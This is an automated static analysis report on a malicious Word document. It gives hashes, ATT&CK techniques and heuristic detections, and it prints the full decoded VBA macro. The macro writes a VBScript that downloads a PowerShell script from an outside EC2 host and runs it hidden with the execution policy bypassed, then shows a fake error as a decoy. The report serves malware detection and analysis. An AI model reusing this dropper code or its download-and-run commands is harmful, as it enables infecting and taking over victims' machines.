Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cfb6072e016f9913…

MALICIOUS

Office (OLE)

Size: 48.5 KB
Created: 2018-01-14 22:30:00
Authoring application: Microsoft Office Word
First seen: 2018-02-07
MD5: 7934daf7086bc482a0ac7be20b8f30f2
SHA-1: 20f357b146bdf8258eff441bb496de6656fc147b
SHA-256: cfb6072e016f9913ffd9ab3563d436f5cb799bf7ed5834529de862807fdba526
Risk Score: 490

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059.001 PowerShell

The sample contains VBA macros that, when executed, write a VBScript file named 'tribanco.vbs' to the user's temporary directory and launch it. That script downloads a PowerShell script from 'http://ec2-52-14-24-60.us-east-2.compute.amazonaws.com:8080/trb.ps1' into the same temporary directory and executes it with the execution policy bypassed and the window hidden. The WScript.Shell and PowerShell references, together with the shell command assembled from string fragments that embeds a URL, strongly indicate downloader/dropper functionality.

Heuristics (12)

  • ClamAV: Doc.Dropper.Agent-6436614-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6436614-0
  • VBA macros detected [medium, 6 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script (shown with surrounding lines):
        Close PayLoadFile
        Shell "wscript " + TempDir + "\tribanco.vbs"
        msg = "This application appears to be made on an older version of the Microsoft Office product suite. Please have the author save to a newer and supported format. [Error Code: -219]"
  • WScript.Shell usage [critical] OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script (shown with surrounding lines):
        Print #1, "objFile.Close( )"
        Print #1, "Set WshShell = WScript.CreateObject("; """WScript.Shell"""; ")"
        Print #1, "WshShell.Run", """powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\"""; "& objNetwork.UserName &"; """\AppData\Local\Temp\trb.ps1"""
  • PowerShell reference in VBA [critical] OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script (shown with surrounding lines):
        Print #1, "Set WshShell = WScript.CreateObject("; """WScript.Shell"""; ")"
        Print #1, "WshShell.Run", """powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\"""; "& objNetwork.UserName &"; """\AppData\Local\Temp\trb.ps1"""
        Print #1, "End Sub"
  • Obfuscated VBA Shell command with URL [critical] OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script (shown with surrounding lines):
        Print #1, "objFile.Close( )"
        Print #1, "Set WshShell = WScript.CreateObject("; """WScript.Shell"""; ")"
        Print #1, "WshShell.Run", """powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\"""; "& objNetwork.UserName &"; """\AppData\Local\Temp\trb.ps1"""
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script (shown with surrounding lines):
        Open FilePath For Output As #1
        Print #1, "Set objNetwork = CreateObject("; """Wscript.Network"""; ")"
        Print #1, "HTTPDownload"; " "; """http://ec2-52-14-24-60.us-east-2.compute.amazonaws.com:8080/trb.ps1"""; ","; """C:\Users\"""; "& objNetwork.UserName &"; """\AppData\Local\Temp\"""
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script (shown with surrounding lines):
        Dim FilePath As String
        TempDir = Environ("temp")
        FilePath = TempDir + "\tribanco.vbs"
  • Reference to PowerShell [high] SC_STR_POWERSHELL
    Reference to PowerShell
  • Reference to Windows Script Host [high] SC_STR_WSCRIPT
    Reference to Windows Script Host
  • LOLBin token sequence in document text [high] SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
      • http://schemas.openxmlformats.org/drawingml/2006/main (referenced by macro)
      • http://ec2-52-14-24-60.us-east-2.compute.amazonaws.com:8080/trb.ps1 (referenced by macro)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2300 bytes
SHA-256: 30e00241a5a21b60ad3f5cf7941055722087b2cd8b52e2a668a34d410810470f

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub WritePayload()
Dim PayLoadFile As Integer
Dim FilePath As String
TempDir = Environ("temp")
FilePath = TempDir + "\tribanco.vbs"
PayLoadFile = FreeFile
Open FilePath For Output As #1
Print #1, "Set objNetwork = CreateObject("; """Wscript.Network"""; ")"
Print #1, "HTTPDownload"; " "; """http://ec2-52-14-24-60.us-east-2.compute.amazonaws.com:8080/trb.ps1"""; ","; """C:\Users\"""; "& objNetwork.UserName &"; """\AppData\Local\Temp\"""
Print #1, "Sub HTTPDownload( myURL, myPath )"
Print #1, "Dim i, objFile, objFSO, objHTTP, strFile, strMsg"
Print #1, "Const ForReading = 1, ForWriting = 2, ForAppending = 8"
Print #1, "Set objFSO = CreateObject("; """Scripting.FileSystemObject"""; ")"
Print #1, "If objFSO.FolderExists( myPath ) Then"
Print #1, "strFile = objFSO.BuildPath( myPath, Mid( myURL, InStrRev(myURL,"; """/"""; ") + 1 ) )"
Print #1, "ElseIf objFSO.FolderExists( Left( myPath, InStrRev( myPath,"; """\"""; ") - 1 ) ) Then"
Print #1, "strFile = myPath"
Print #1, "End If"
Print #1, "Set objFile = objFSO.OpenTextFile( strFile, ForWriting, True)"
Print #1, "Set objHTTP = CreateObject( "; """WinHttp.WinHttpRequest.5.1"""; ")"
Print #1, "objHTTP.Open "; " "; """GET"""; " "; ","; "myURL,"; "False"
Print #1, "objHTTP.Send"
Print #1, "For i = 1 To LenB( objHTTP.ResponseBody )"
Print #1, "objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1) ) )"
Print #1, "Next"
Print #1, "objFile.Close( )"
Print #1, "Set WshShell = WScript.CreateObject("; """WScript.Shell"""; ")"
Print #1, "WshShell.Run", """powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\"""; "& objNetwork.UserName &"; """\AppData\Local\Temp\trb.ps1"""
Print #1, "End Sub"
Close PayLoadFile
Shell "wscript " + TempDir + "\tribanco.vbs"
msg = "This application appears to be made on an older version of the Microsoft Office product suite. Please have the author save to a newer and supported format. [Error Code: -219]"
intResponse = MsgBox(msg, 16, Title)
Application.Quit
End Sub